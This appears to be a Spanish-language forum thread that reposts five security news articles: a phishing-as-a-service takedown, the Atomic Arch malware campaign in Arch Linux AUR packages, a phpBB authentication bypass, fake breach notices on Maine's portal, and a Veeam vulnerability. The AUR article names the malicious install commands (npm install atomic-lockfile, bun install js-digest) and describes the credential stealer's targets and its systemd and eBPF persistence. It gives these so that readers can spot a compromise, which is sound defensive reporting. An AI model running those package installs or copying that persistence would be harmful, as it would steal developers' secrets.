Una operación internacional liderada por INTERPOL ha logrado desmantelar Sniper Dz, una de las plataformas de Phishing-as-a-Service (PhaaS) más longevas y utilizadas del panorama del cibercrimen. La acción, denominada Operación Ramz, culminó con la detención de cientos de sospechosos, la incautación de infraestructura utilizada para campañas de phishing y el cierre de un servicio que durante años facilitó ataques de robo de credenciales a escala global.

Según reveló la firma de ciberseguridad Group-IB, la operación se desarrolló entre octubre de 2025 y febrero de 2026 y contó con la participación coordinada de organismos policiales de 13 países pertenecientes a la región de Oriente Medio y Norte de África (MENA). Como resultado, las autoridades efectuaron 201 arrestos, incluyendo la captura del supuesto desarrollador principal y administrador de Sniper Dz.

La operación representa uno de los golpes más importantes contra el ecosistema de Phishing-as-a-Service en los últimos años y pone de manifiesto el creciente nivel de cooperación internacional para combatir las amenazas cibernéticas transfronterizas.

¿Qué era Sniper Dz?

Sniper Dz fue una plataforma especializada en ofrecer herramientas de phishing listas para usar a ciberdelincuentes con poca o ninguna experiencia técnica. Activa al menos desde 2015, la plataforma evolucionó con el tiempo hasta convertirse en un completo servicio criminal que proporcionaba kits de phishing, alojamiento web, infraestructura de soporte y recursos de capacitación para facilitar campañas de robo de credenciales.

A lo largo de su existencia, el servicio operó bajo distintos nombres, incluyendo:

• Sniper Dz
• Joker Dz
• Storm Dz
• Spam Dz

Este cambio constante de identidad permitió a sus operadores mantener la actividad durante años mientras evitaban la atención de investigadores y organismos de seguridad.

Las investigaciones indican que la plataforma estuvo relacionada con más de 20.000 dominios únicos utilizados para alojar páginas fraudulentas diseñadas para suplantar marcas legítimas y engañar a usuarios de todo el mundo.

La Operación Ramz y la captura de los responsables

Uno de los principales objetivos de la Operación Ramz fue identificar y neutralizar la infraestructura detrás de Sniper Dz.

Las autoridades lograron localizar y detener a Guedz, señalado como desarrollador principal y administrador de la plataforma. La detención fue realizada por la Policía Nacional de Argelia, que además colaboró en la incautación de hardware utilizado para operar los servicios de phishing.

Durante los registros, las fuerzas de seguridad confiscaron servidores, equipos informáticos, software especializado y scripts utilizados para desplegar campañas fraudulentas.

El cierre del portal principal utilizado para distribuir los kits de phishing también representa un golpe significativo para la comunidad criminal que dependía de esta infraestructura para lanzar ataques contra usuarios y organizaciones.

Más de 45.000 víctimas y miles de credenciales robadas

De acuerdo con Group-IB, Sniper Dz habría recopilado más de 45.000 registros de víctimas durante su actividad.

Los datos robados incluían:

• Credenciales de acceso.
• Información personal identificable.
• Direcciones de correo electrónico.
• Datos financieros.
• Información de autenticación utilizada en servicios digitales.

Lo más preocupante es que la plataforma permitía a cualquier ciberdelincuente lanzar campañas sofisticadas sin necesidad de conocimientos avanzados en programación o infraestructura.

Este modelo de negocio reducía significativamente las barreras de entrada al cibercrimen y facilitaba la proliferación de ataques a gran escala.

Grandes marcas internacionales fueron utilizadas como señuelo

Los investigadores identificaron más de 80 plantillas de phishing utilizadas por Sniper Dz para suplantar servicios legítimos.

Entre las organizaciones más utilizadas por los atacantes se encontraban:

• PayPal
• Facebook
• Instagram
• Yahoo
• Netflix
• Steam

Las páginas fraudulentas imitaban de forma convincente la apariencia de estos servicios para inducir a los usuarios a ingresar sus credenciales.

Además, las campañas estaban disponibles en cinco idiomas:

• Árabe
• Inglés
• Francés
• Español
• Hebreo

Esta capacidad multilingüe permitió a los operadores expandir sus actividades a diversas regiones geográficas y aumentar significativamente el número potencial de víctimas.

Ingeniería social y suplantación de figuras públicas

Uno de los aspectos más sofisticados de la operación era el uso intensivo de técnicas de ingeniería social.

Según Group-IB, los operadores no se limitaban a distribuir páginas falsas de inicio de sesión. También creaban perfiles fraudulentos en redes sociales haciéndose pasar por figuras públicas, celebridades y personalidades políticas reconocidas en la región MENA.

Estas cuentas falsas promocionaban:

• Supuestas ofertas exclusivas.
• Programas de acceso gratuito a internet.
• Promociones especiales.
• Sorteos falsos.
• Beneficios gubernamentales inexistentes.

El objetivo era generar confianza en las víctimas antes de redirigirlas a sitios web diseñados para robar credenciales o información sensible.

Esta estrategia aumentaba considerablemente las tasas de éxito de las campañas de phishing.

Telegram como centro de operaciones

La popularidad de Sniper Dz creció en gran medida gracias al uso de Telegram como canal de distribución y soporte.

Investigaciones previas realizadas por investigadores de seguridad revelaron que los operadores gestionaban un canal con más de 7.300 suscriptores donde compartían:

• Tutoriales en vídeo.
• Guías paso a paso.
• Actualizaciones de herramientas.
• Consejos para maximizar campañas de phishing.
• Soporte técnico para usuarios del servicio.

Este enfoque permitió crear una auténtica comunidad criminal alrededor de la plataforma, facilitando la incorporación de nuevos actores al ecosistema del phishing.

Un modelo PhaaS gratuito que impulsó su expansión

A diferencia de otras plataformas Phishing-as-a-Service que operan mediante suscripciones o pagos mensuales, Sniper Dz destacaba por ofrecer gran parte de su infraestructura de forma gratuita.

Este modelo eliminaba prácticamente cualquier barrera económica para los ciberdelincuentes.

La monetización se producía posteriormente mediante:

• Robo de credenciales.
• Venta de datos robados.
• Fraudes de facturación móvil.
• Suscripciones SMS premium.
• Campañas de afiliación fraudulentas.
• Abuso de notificaciones del navegador.
• Estafas basadas en redirecciones de tráfico.

Los usuarios que no proporcionaban credenciales eran redirigidos a esquemas alternativos de monetización diseñados para generar ingresos igualmente.

El crecimiento del modelo Phishing-as-a-Service

El caso de Sniper Dz refleja una tendencia cada vez más preocupante dentro del panorama de amenazas: la industrialización del phishing.

Las plataformas PhaaS han transformado el phishing tradicional en un servicio comercializado que permite a cualquier persona lanzar ataques complejos utilizando herramientas prefabricadas.

Este modelo ha contribuido al aumento global de:

• Robo de credenciales corporativas.
• Secuestro de cuentas.
• Fraudes financieros.
• Ataques de ransomware.
• Compromisos de correo empresarial (BEC).

Al reducir los requisitos técnicos necesarios para operar campañas maliciosas, estas plataformas amplían constantemente el número de actores capaces de participar en actividades delictivas.

Un golpe importante contra el cibercrimen organizado

La desarticulación de Sniper Dz representa una victoria significativa para las fuerzas de seguridad internacionales y para la comunidad de ciberseguridad.

Sin embargo, los expertos advierten que el cierre de una plataforma no elimina el problema de fondo. El modelo Phishing-as-a-Service continúa creciendo y nuevos servicios suelen ocupar rápidamente el espacio dejado por operaciones desmanteladas.

Aun así, la Operación Ramz demuestra que la cooperación internacional, el intercambio de inteligencia y la colaboración entre organismos policiales y empresas privadas pueden generar resultados efectivos contra redes criminales altamente organizadas.

La caída de Sniper Dz no solo elimina una infraestructura utilizada durante más de una década para robar credenciales, sino que también envía un mensaje claro a los operadores de plataformas PhaaS: incluso los servicios más consolidados y sofisticados pueden ser identificados, rastreados y finalmente desmantelados por las autoridades.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La comunidad de Linux enfrenta una de las campañas de ataque a la cadena de suministro más importantes de los últimos años después de que actores maliciosos lograran comprometer más de 400 paquetes alojados en el Arch User Repository (AUR). La operación, bautizada como Atomic Arch por los investigadores de Sonatype, permitió distribuir malware diseñado para robar credenciales, tokens de acceso, claves SSH y otros secretos críticos de desarrolladores y administradores de sistemas.

A diferencia de muchos incidentes recientes relacionados con vulnerabilidades de software o fallos de seguridad de día cero, este ataque explotó directamente el modelo de confianza del ecosistema AUR. Los atacantes no comprometieron la infraestructura de Arch Linux ni vulneraron los repositorios oficiales. En su lugar, aprovecharon paquetes abandonados o huérfanos para heredar la reputación y confianza acumulada durante años por sus mantenedores originales.

El resultado fue una campaña de gran alcance capaz de afectar a cualquier usuario que compilara o actualizara paquetes comprometidos desde el 11 de junio.

Cómo funcionó el ataque contra el Arch User Repository

El Arch User Repository es una plataforma comunitaria que permite a los usuarios compartir scripts de construcción conocidos como PKGBUILD para instalar software en Arch Linux. A diferencia de los repositorios oficiales, estos paquetes son mantenidos por la comunidad y dependen en gran medida de la confianza entre desarrolladores y usuarios.

Los atacantes identificaron paquetes abandonados cuyos mantenedores originales ya no participaban activamente en el proyecto. Posteriormente solicitaron la adopción de dichos paquetes, un procedimiento legítimo dentro del ecosistema AUR.

Una vez obtenidos los permisos de mantenimiento, modificaron discretamente los archivos PKGBUILD y los scripts de instalación para incorporar instrucciones maliciosas. Como los nombres de los paquetes, el historial del proyecto y la funcionalidad final permanecían intactos, los usuarios no tenían motivos aparentes para sospechar.

Además, los investigadores descubrieron intentos de falsificación de metadatos de Git para que determinadas modificaciones parecieran realizadas por mantenedores históricos de confianza, aumentando aún más la credibilidad de los cambios.

El paquete malicioso oculto tras una instalación aparentemente legítima

La carga maliciosa principal se distribuía mediante la ejecución de:

• npm install atomic-lockfile
• bun install js-digest

Durante el proceso de compilación del paquete.

En la primera oleada, el paquete npm [email protected] incluía un script de preinstalación encargado de ejecutar un binario ELF para Linux denominado deps.

Desde la perspectiva del usuario, la instalación parecía completamente normal. El software solicitado se instalaba correctamente y funcionaba según lo esperado. Sin embargo, en segundo plano, el malware comenzaba a recopilar información sensible del sistema.

Este enfoque demuestra una evolución significativa en los ataques a la cadena de suministro, donde los ciberdelincuentes ya no necesitan engañar a los usuarios con aplicaciones falsas, sino que aprovechan proyectos legítimos y ampliamente utilizados.

Qué información roba el malware

Tras analizar el binario malicioso mediante ingeniería inversa, el investigador independiente Whanos identificó un sofisticado ladrón de credenciales desarrollado en Rust y orientado específicamente a entornos de desarrollo.

Entre los datos recopilados se encuentran:

Navegadores Chromium

El malware extrae información de navegadores basados en Chromium, incluyendo:

• Google Chrome
• Microsoft Edge
• Brave
• Opera
• Otros derivados de Chromium

Los datos robados incluyen cookies, sesiones activas, tokens de autenticación y almacenamiento local.

Aplicaciones Electron

La amenaza también apunta a plataformas empresariales y de colaboración como:

• Slack
• Discord
• Microsoft Teams

Esto permite a los atacantes secuestrar sesiones activas sin necesidad de conocer contraseñas.

Credenciales de desarrollo

Uno de los objetivos prioritarios son los entornos DevOps y desarrollo de software. El malware busca:

• Tokens de GitHub
• Credenciales npm
• Secretos de HashiCorp Vault
• Tokens asociados con OpenAI y ChatGPT
• Información de cuentas y metadatos
• Infraestructura y acceso remoto

La carga maliciosa también recopila:

• Claves SSH
• Archivos known_hosts
• Historiales de terminal
• Configuraciones VPN
• Credenciales Docker
• Credenciales Podman

Esta información puede utilizarse posteriormente para comprometer servidores corporativos, repositorios de código y entornos de nube.

Persistencia avanzada mediante systemd

Una vez ejecutado, el malware intenta mantenerse activo incluso después de reinicios.

Para lograrlo instala servicios persistentes mediante systemd.

Cuando obtiene privilegios de root:

• Se copia en directorios bajo /var/lib/
• Crea servicios en /etc/systemd/system/
• Configura reinicio automático permanente

Si se ejecuta con privilegios limitados:

• Se instala en el directorio del usuario
• Utiliza unidades bajo ~/.config/systemd/user/
• Mantiene persistencia a nivel de sesión

Esto dificulta significativamente la detección y eliminación manual.

El peligroso rootkit eBPF

Uno de los elementos más llamativos de la campaña es la presencia opcional de un rootkit basado en eBPF.

Aunque inicialmente algunos informes sugirieron que el rootkit era el componente principal del ataque, los análisis posteriores demostraron que únicamente se carga cuando el malware ya dispone de privilegios elevados.

Su función principal consiste en ocultar:

• Procesos maliciosos
• Nombres de procesos
• Conexiones de red
• Inodos de sockets
• Actividad asociada al malware

Además, intenta bloquear herramientas de depuración para dificultar los análisis forenses.

Los investigadores identificaron mapas BPF persistentes con nombres como:

• hidden_pids
• hidden_names
• hidden_inodes

La presencia de estos artefactos constituye un fuerte indicador de compromiso.

Más de 400 paquetes afectados y una segunda oleada

Los primeros informes de Sonatype identificaron poco más de veinte paquetes comprometidos. Sin embargo, las investigaciones comunitarias posteriores revelaron una dimensión mucho mayor.

En apenas 24 horas, investigadores y usuarios de Arch Linux habían identificado más de 400 paquetes comprometidos.

Las estimaciones más recientes sitúan la cifra en aproximadamente 408 paquetes, aunque la lista continúa evolucionando debido a la eliminación de commits maliciosos y nuevos hallazgos.

Posteriormente apareció una segunda campaña basada en el paquete malicioso js-digest, distribuido mediante Bun en lugar de npm.

Los investigadores creen que ambas operaciones están relacionadas debido a similitudes en la infraestructura utilizada y en los responsables de publicar los paquetes maliciosos.

Qué deben hacer los usuarios afectados

Los administradores de Arch Linux recomiendan asumir una posible exposición si se instaló o actualizó cualquier paquete AUR después del 11 de junio.

Las medidas prioritarias incluyen:

Verificar paquetes instalados

Comparar todos los paquetes AUR instalados con las listas comunitarias de paquetes comprometidos.

Buscar indicadores de compromiso

Revisar:

• npm install atomic-lockfile
• bun install js-digest
• src/hooks/deps

En historiales de compilación y registros del sistema.

Rotar credenciales

Si el malware pudo ejecutarse, se recomienda reemplazar inmediatamente:

• Claves SSH
• Tokens GitHub
• Tokens npm
• Credenciales Docker
• Secretos Vault
• Sesiones de navegador
• Credenciales de servicios cloud

Revisar persistencia

Inspeccionar:

• Servicios systemd desconocidos
• Directorios /var/lib/
• ~/.config/systemd/user/
• /sys/fs/bpf/

En busca de artefactos sospechosos.

Reinstalar sistemas comprometidos

Si el paquete se ejecutó con privilegios root, los expertos recomiendan una reinstalación completa desde medios confiables.

La presencia potencial de un rootkit eBPF impide garantizar la integridad del sistema mediante simples procedimientos de limpieza.

Un nuevo ejemplo de los riesgos en la cadena de suministro

La campaña Atomic Arch demuestra que los atacantes están desplazando cada vez más su atención hacia la confianza depositada en proyectos legítimos y mantenedores históricos.

En lugar de explotar vulnerabilidades técnicas complejas, los ciberdelincuentes heredaron la reputación de proyectos abandonados para distribuir malware de forma silenciosa y efectiva.

El incidente también pone de relieve la necesidad de revisar cuidadosamente cualquier PKGBUILD o script de instalación antes de compilar software desde AUR, especialmente cuando se trata de paquetes recientemente adoptados o proyectos que han permanecido inactivos durante largos periodos.

A medida que continúan las investigaciones, este ataque ya se perfila como uno de los incidentes más significativos de 2026 relacionados con la seguridad de la cadena de suministro en Linux, recordando a desarrolladores y administradores que la confianza puede convertirse en el vector de ataque más peligroso cuando no se verifica adecuadamente.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Una vulnerabilidad de seguridad crítica descubierta recientemente en phpBB ha encendido las alarmas dentro de la comunidad de ciberseguridad. El fallo, que permaneció oculto durante aproximadamente una década dentro de la base de código de la popular plataforma de foros, permite a un atacante autenticarse como cualquier usuario del sistema, incluidos administradores con privilegios elevados.

La vulnerabilidad fue identificada por investigadores de la empresa de seguridad de aplicaciones Aikido, quienes alertaron sobre el riesgo de compromiso masivo de foros que todavía utilizan versiones vulnerables del software. Lo más preocupante es que el error puede explotarse mediante una única solicitud HTTP y no requiere configuraciones especiales ni conocimientos avanzados para ser aprovechado.

Un fallo de autenticación presente durante 10 años

Según el informe publicado por Aikido, la vulnerabilidad fue introducida en el código fuente de phpBB hace aproximadamente diez años y ha permanecido activa en múltiples versiones de la plataforma sin ser detectada.

El problema afecta a todas las versiones comprendidas entre las ramas 3.x y 4.x, concretamente hasta phpBB 3.3.16 y phpBB 4.0.0-a2. Esto significa que miles de foros en todo el mundo podrían haber estado expuestos durante años a una vulnerabilidad capaz de comprometer completamente la integridad de sus sistemas de autenticación.

Los investigadores descubrieron el fallo el pasado 2 de junio y notificaron inmediatamente a los desarrolladores de phpBB mediante el programa de divulgación responsable de vulnerabilidades de HackerOne.

La respuesta del equipo de desarrollo fue rápida. Apenas cuatro días después, el 6 de junio, se publicó phpBB 3.3.17, una actualización que corrige el problema para la rama estable 3.x. Sin embargo, los usuarios de la versión 4.x aún esperan una solución oficial, lo que mantiene a estos entornos en una situación de riesgo potencial.

Cómo funciona la vulnerabilidad

Aunque Aikido decidió no revelar los detalles técnicos completos para evitar abusos inmediatos, sí confirmó que la explotación es extremadamente sencilla.

La falla permite a un atacante autenticarse como cualquier usuario registrado en el foro sin necesidad de conocer sus credenciales legítimas. El ataque puede ejecutarse mediante una única petición HTTP cuidadosamente diseñada, lo que reduce significativamente la complejidad operativa requerida para comprometer una plataforma vulnerable.

Los investigadores destacaron que la vulnerabilidad es explotable utilizando la configuración predeterminada de phpBB, sin necesidad de módulos adicionales, personalizaciones especiales o configuraciones inseguras por parte del administrador.

Esta característica convierte al fallo en una amenaza especialmente peligrosa, ya que prácticamente cualquier instalación vulnerable podría ser atacada de forma inmediata.

Riesgos para administradores y usuarios

Las consecuencias de una explotación exitosa pueden ser extremadamente graves para los propietarios de foros y las comunidades que dependen de phpBB.

Al obtener acceso a una cuenta de administrador, un atacante puede controlar prácticamente todos los aspectos del foro, incluyendo:

• Acceso a mensajes privados almacenados en la plataforma.
• Creación, modificación o eliminación de cuentas de usuario.
• Alteración de publicaciones y contenido histórico.
• Manipulación de configuraciones del foro.
• Suplantación de administradores, moderadores o empleados.
• Difusión de desinformación o contenido malicioso.
• Desfiguración completa del sitio web.

Además, phpBB mantiene por defecto una lista pública de miembros registrados, lo que facilita enormemente la identificación de objetivos potenciales para los ciberdelincuentes.

Esta característica reduce aún más las barreras para los atacantes, quienes pueden localizar fácilmente nombres de usuario privilegiados y utilizarlos como objetivo principal de la explotación.

¿Es posible lograr ejecución remota de código?

A pesar de la gravedad de la vulnerabilidad, los investigadores aclararon que el fallo no permite directamente la ejecución remota de código (RCE).

Según Aikido, phpBB mantiene una capa adicional de protección para acceder al Panel de Control de Administración (ACP), la cual requiere una comprobación independiente de contraseña. Esta medida evita que un atacante que haya secuestrado una cuenta administrativa pueda ejecutar código arbitrario directamente en el servidor mediante esta vulnerabilidad específica.

Sin embargo, esto no reduce significativamente el impacto general del problema. El acceso administrativo sigue siendo suficiente para comprometer información sensible, afectar a los usuarios y causar daños operativos y reputacionales importantes.

phpBB sigue siendo una plataforma ampliamente utilizada

Aunque su momento de mayor popularidad ocurrió durante los años 2000 y principios de la década de 2010, phpBB continúa siendo una de las plataformas de foros de código abierto más utilizadas del mundo.

Miles de comunidades, sitios especializados, foros empresariales y proyectos independientes siguen confiando en esta tecnología para gestionar discusiones, soporte técnico y contenido generado por usuarios.

Precisamente por esta amplia adopción, una vulnerabilidad de autenticación capaz de comprometer cuentas administrativas representa una amenaza significativa para el ecosistema digital.

Los foros suelen almacenar grandes cantidades de información personal, mensajes privados, direcciones de correo electrónico y datos históricos que podrían resultar atractivos para actores maliciosos.

Actualización urgente recomendada

Los investigadores recomiendan encarecidamente que todos los administradores de foros phpBB actualicen sus instalaciones lo antes posible.

Para los usuarios de la rama estable 3.x, la actualización a phpBB 3.3.17 es actualmente la principal medida de mitigación disponible. En el caso de las implementaciones basadas en la rama 4.x, se aconseja seguir las recomendaciones oficiales del proyecto y aplicar las correcciones disponibles desde la versión de desarrollo principal mientras se publica una actualización definitiva.

Aikido también tomó medidas adicionales para reducir el riesgo de explotación masiva. Además de mantener en reserva los detalles técnicos del fallo, la empresa contactó directamente con administradores de grandes comunidades basadas en phpBB para alertarlos sobre la necesidad urgente de aplicar los parches de seguridad.

Posibles problemas con OAuth tras la actualización

Uno de los aspectos que los administradores deben considerar durante el proceso de actualización es la posible interrupción temporal de los sistemas de autenticación OAuth.

Los desarrolladores modificaron la ubicación del manejador de redirección OAuth dentro de la plataforma, lo que podría provocar errores de inicio de sesión en algunos foros que dependen de proveedores externos de autenticación.

Afortunadamente, los investigadores indican que este problema suele resolverse de forma sencilla mediante la actualización de las configuraciones correspondientes en los proveedores OAuth utilizados por cada sitio.

Una vulnerabilidad que demuestra la importancia de las auditorías de código

El descubrimiento de este fallo pone de manifiesto cómo incluso proyectos maduros y ampliamente utilizados pueden albergar vulnerabilidades críticas durante largos periodos sin ser detectadas.

La permanencia de este error durante una década demuestra la importancia de realizar auditorías de seguridad continuas, revisiones periódicas del código y programas de divulgación responsable que permitan identificar debilidades antes de que sean explotadas por actores maliciosos.

Mientras la comunidad espera la publicación de los detalles técnicos completos por parte de Aikido, la prioridad para los administradores debe ser clara: verificar inmediatamente la versión instalada de phpBB, aplicar las actualizaciones disponibles y supervisar cualquier actividad sospechosa que pueda indicar intentos de explotación de esta grave vulnerabilidad de evasión de autenticación.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La Oficina del Fiscal General de Maine ha decidido desactivar temporalmente el acceso público a su portal de notificación de brechas de datos después de detectar la publicación de informes fraudulentos que simulaban provenir de empresas tecnológicas reconocidas como Discord y VRChat. El incidente ha generado preocupación dentro de la comunidad de ciberseguridad y ha puesto de relieve los riesgos asociados a los sistemas automatizados de divulgación de incidentes de seguridad.

La medida fue adoptada tras descubrirse que actores desconocidos utilizaron el sistema oficial del estado para presentar notificaciones falsas de filtraciones de datos, las cuales fueron publicadas automáticamente en la base de datos pública sin una validación previa. Como resultado, las autoridades de Maine han iniciado una revisión exhaustiva de sus procedimientos con el objetivo de reforzar los mecanismos de verificación y evitar futuros abusos.

Informes falsos de brechas de datos desencadenan la investigación

El caso salió a la luz después de que se detectaran supuestas divulgaciones de brechas de datos atribuidas a Discord y VRChat en el portal oficial del estado de Maine. Ambas notificaciones describían incidentes de seguridad inexistentes y fueron presentadas utilizando información falsa.

En el caso de VRChat, la situación resultó especialmente llamativa debido a que el informe fraudulento aseguraba que una presunta filtración había afectado a más de 2,4 millones de usuarios. Además, la documentación incluía el nombre de un supuesto empleado que, según confirmó posteriormente la empresa, nunca existió.

Tras ser contactada por medios especializados, VRChat negó categóricamente haber sufrido la brecha reportada y confirmó que no había presentado ninguna notificación ante las autoridades estatales. La compañía calificó la divulgación como completamente fraudulenta y desvinculó a su organización de cualquier relación con el reporte publicado.

Discord también apareció como víctima de una notificación falsa, aunque la empresa no emitió comentarios públicos inmediatos sobre el incidente.

La respuesta de la Fiscalía General de Maine

Ante la gravedad de los hechos, la Oficina del Fiscal General de Maine emitió un comunicado oficial reconociendo que el sistema había sido objeto de abuso por parte de actores desconocidos.

Según la institución, las conversaciones mantenidas con VRChat permitieron confirmar que las notificaciones publicadas eran engañosas y no estaban relacionadas con ninguna actividad legítima de las empresas afectadas. Como consecuencia, los informes fraudulentos fueron eliminados de la base de datos pública.

Las autoridades también aclararon que no tenían conocimiento de ninguna brecha de datos reciente relacionada con Discord o VRChat, contradiciendo por completo las afirmaciones contenidas en los documentos presentados.

La investigación continúa abierta mientras se intenta determinar quién fue el responsable de enviar las notificaciones falsas y si existen más casos similares que hayan pasado desapercibidos antes de la suspensión del servicio.

Un sistema automatizado vulnerable al abuso

Uno de los aspectos más preocupantes del incidente es la forma en que funcionaba el portal de divulgación de brechas de datos de Maine. Antes de su cierre temporal, las notificaciones enviadas por las organizaciones eran publicadas automáticamente en la base de datos pública, sin un proceso previo de verificación independiente.

La propia Oficina del Fiscal General reconoció que la información proporcionada por las entidades notificantes se incorporaba directamente al sistema. Esto significa que cualquier reporte enviado podía hacerse visible públicamente antes de que las autoridades confirmaran su autenticidad.

Aunque este enfoque buscaba agilizar la publicación de incidentes de seguridad y mejorar la transparencia, también abrió una puerta para la difusión de información falsa, campañas de desinformación y posibles ataques reputacionales contra empresas legítimas.

El incidente evidencia cómo los procesos automatizados, cuando carecen de controles adecuados, pueden convertirse en vectores de manipulación de la información.

Impacto para empresas y consumidores

La publicación de informes falsos de brechas de datos puede generar consecuencias significativas para las organizaciones afectadas. Incluso cuando una empresa logra demostrar rápidamente que la información es incorrecta, el daño reputacional puede producirse en cuestión de horas.

Los consumidores suelen reaccionar con preocupación ante noticias relacionadas con filtraciones de datos personales, especialmente cuando se trata de plataformas populares con millones de usuarios. La difusión de información errónea puede provocar pérdida de confianza, cancelación de cuentas, consultas masivas a los servicios de soporte y una cobertura mediática negativa.

Además, este tipo de incidentes puede afectar a inversionistas, socios comerciales y organismos reguladores que dependen de las notificaciones públicas para evaluar riesgos de seguridad y cumplimiento normativo.

Desde una perspectiva de ciberseguridad, el caso también demuestra que la desinformación puede convertirse en una herramienta efectiva para generar caos, erosionar la confianza pública y perjudicar a organizaciones específicas sin necesidad de comprometer realmente sus sistemas.

Un recurso clave para investigadores y analistas de amenazas

El portal de notificación de brechas de Maine se había convertido en una fuente de información ampliamente utilizada por periodistas, investigadores de seguridad, equipos de respuesta a incidentes y empresas de inteligencia de amenazas.

Las divulgaciones públicas permiten monitorear ataques cibernéticos, rastrear campañas de ransomware, identificar tendencias en filtraciones de datos y verificar el cumplimiento de las obligaciones de notificación por parte de las organizaciones afectadas.

Por esta razón, la suspensión temporal del acceso público también tendrá un impacto en la comunidad de ciberseguridad, que utiliza estas bases de datos para detectar incidentes emergentes y analizar la evolución del panorama de amenazas.

Aunque las empresas podrán seguir enviando notificaciones a través del sistema, quienes deseen acceder a las divulgaciones deberán solicitarlas directamente a la Oficina del Fiscal General mientras se implementan nuevas medidas de seguridad.

Lecciones para los sistemas de divulgación de incidentes

El caso de Maine pone de manifiesto la necesidad de equilibrar transparencia y verificación en los mecanismos de reporte de brechas de datos. A medida que las organizaciones y los organismos gubernamentales adoptan procesos más automatizados, resulta fundamental incorporar controles que permitan validar la autenticidad de las notificaciones antes de su publicación.

Entre las medidas que podrían implementarse se encuentran la autenticación reforzada de las entidades notificantes, la validación manual de ciertos campos críticos, la verificación de contactos corporativos y la revisión preliminar de informes antes de que sean visibles públicamente.

La situación también sirve como recordatorio de que los actores maliciosos no solo buscan explotar vulnerabilidades técnicas, sino también debilidades en los procesos administrativos y de comunicación. En un entorno donde la confianza y la reputación son activos esenciales, la protección contra la desinformación se ha convertido en un componente clave de la estrategia moderna de ciberseguridad.

La revisión emprendida por Maine podría sentar un precedente para otros estados y organismos que gestionan sistemas similares, impulsando nuevas prácticas destinadas a garantizar la integridad de la información publicada y fortalecer la confianza en los procesos de divulgación de incidentes de seguridad.

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

La empresa especializada en protección de datos Veeam Software ha publicado actualizaciones de seguridad para solucionar una vulnerabilidad crítica en su plataforma Veeam Backup & Replication, un producto ampliamente utilizado por organizaciones de todo el mundo para la gestión de copias de seguridad, recuperación ante desastres y continuidad del negocio.

La falla, identificada como CVE-2026-44963, ha recibido una puntuación de 9.4 sobre 10 en la escala CVSS, lo que la sitúa entre las vulnerabilidades más graves descubiertas recientemente en soluciones empresariales de respaldo. Según la compañía, el fallo podría permitir a un usuario autenticado ejecutar código remoto en el servidor de respaldo, comprometiendo potencialmente sistemas críticos y datos corporativos sensibles.

La publicación de este parche vuelve a poner de relieve la importancia de mantener actualizadas las infraestructuras de backup, especialmente en un contexto donde los grupos de ransomware han convertido las plataformas de respaldo en uno de sus principales objetivos.

¿Qué es la vulnerabilidad CVE-2026-44963?

La vulnerabilidad CVE-2026-44963 afecta al componente principal de Veeam Backup & Replication, permitiendo que un usuario autenticado dentro de un dominio ejecute código arbitrario de forma remota sobre el servidor de respaldo.

De acuerdo con el aviso oficial emitido por Veeam, la explotación exitosa del fallo podría otorgar a un atacante la capacidad de ejecutar comandos maliciosos dentro de la infraestructura afectada.

CitarLa compañía describió el problema como:

"Una vulnerabilidad que permite la ejecución remota de código (RCE) en el servidor de respaldo por parte de un usuario de dominio autenticado".

Aunque el ataque requiere credenciales válidas dentro del entorno corporativo, los expertos advierten que este requisito no reduce significativamente el riesgo, ya que muchos ataques modernos comienzan precisamente con el robo o compromiso de cuentas legítimas.

Una vez que un atacante obtiene acceso inicial a una red empresarial, una vulnerabilidad de este tipo puede facilitar movimientos laterales, escaladas de privilegios y la toma de control de sistemas críticos.

Versiones afectadas de Veeam Backup & Replication

Según la información proporcionada por Veeam, la vulnerabilidad impacta a:

• Veeam Backup & Replication 12.3.2.4465
• Todas las versiones anteriores de la rama 12.x

Esto significa que miles de organizaciones podrían encontrarse potencialmente expuestas si aún no han aplicado las actualizaciones más recientes.

La buena noticia es que la compañía confirmó que la nueva generación del producto no es vulnerable.

Versiones no afectadas

Veeam indicó que la serie 13.x no presenta esta vulnerabilidad debido a cambios arquitectónicos implementados durante el desarrollo de esa versión.

Esta diferencia demuestra cómo las mejoras estructurales introducidas en nuevas plataformas pueden reducir significativamente la superficie de ataque frente a amenazas emergentes.

Investigador de watchTowr descubre el fallo

El descubrimiento de la vulnerabilidad fue atribuido a watchTowr Labs, una reconocida organización de investigación en ciberseguridad.

En particular, Veeam reconoció el trabajo del investigador Sina Kheirkhah, quien identificó y reportó el problema siguiendo prácticas responsables de divulgación.

La colaboración entre investigadores independientes y fabricantes de software continúa siendo uno de los pilares fundamentales para mejorar la seguridad del ecosistema digital.

Gracias a este proceso de divulgación coordinada, Veeam pudo desarrollar y distribuir una solución antes de que la vulnerabilidad fuera explotada masivamente.

Actualización de seguridad disponible

La vulnerabilidad ha sido corregida en:

• Veeam Backup & Replication 12.3.2.4854

La compañía recomienda encarecidamente actualizar de inmediato a esta versión para eliminar cualquier riesgo asociado a CVE-2026-44963.

Los administradores de sistemas deben considerar esta actualización como una prioridad crítica, especialmente en entornos donde los servidores de respaldo contienen:

• Copias de seguridad de servidores corporativos.
• Máquinas virtuales.
• Bases de datos empresariales.
• Información financiera.
• Datos de clientes.
• Activos estratégicos de la organización.

Un compromiso exitoso del sistema de backup podría permitir a los atacantes acceder a una enorme cantidad de información sensible.

¿Por qué los servidores de respaldo son objetivos prioritarios?

En los últimos años, los ciberdelincuentes han modificado significativamente sus tácticas de ataque.

Anteriormente, los grupos de ransomware se centraban principalmente en cifrar estaciones de trabajo y servidores productivos. Sin embargo, actualmente también buscan comprometer las plataformas de respaldo.

El motivo es simple: si una organización conserva copias de seguridad intactas, puede recuperar sus sistemas sin pagar rescates.

Por esta razón, los atacantes suelen intentar:

• Eliminar respaldos.
• Modificar repositorios de copias de seguridad.
• Cifrar servidores de backup.
• Robar información almacenada.
• Desactivar mecanismos de recuperación.

Una vulnerabilidad de ejecución remota de código en una plataforma de respaldo puede convertirse en una puerta de entrada extremadamente valiosa para operaciones de extorsión y sabotaje.

Historial reciente de vulnerabilidades en Veeam

La divulgación de CVE-2026-44963 no es un incidente aislado.

En marzo de 2026, Veeam publicó múltiples actualizaciones destinadas a corregir varias vulnerabilidades críticas en Backup & Replication.

